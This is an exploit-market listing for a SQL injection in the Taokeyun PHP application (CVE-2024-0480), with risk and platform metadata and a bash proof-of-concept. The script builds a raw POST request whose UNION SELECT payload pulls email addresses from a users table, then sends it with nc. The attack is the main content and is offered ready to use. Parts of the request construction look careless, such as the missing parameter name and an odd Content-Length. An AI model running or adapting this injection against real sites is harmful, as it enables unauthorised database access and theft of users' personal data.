[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Taokeyun SQL Injection Vulnerability

Author
Amirhossein Bahramizadeh
Risk
[
Security Risk High
]
0day-ID
0day-ID-39244
Category
web applications
Date add
15-01-2024
CVE
CVE-2024-0480
Platform
php
#!/bin/bash

# Variables
url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"
cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"

# Construct the request
request="POST $url HTTP/1.1\r\n"
request+="Content-Type: application/x-www-form-urlencoded\r\n"
request+="Content-Length: $((${#cid}+15))\r\n\r\n"
request+="$cid"

# Send the request
(echo -e "$request") | nc example.com 80

#  0day.today [2024-12-23]  #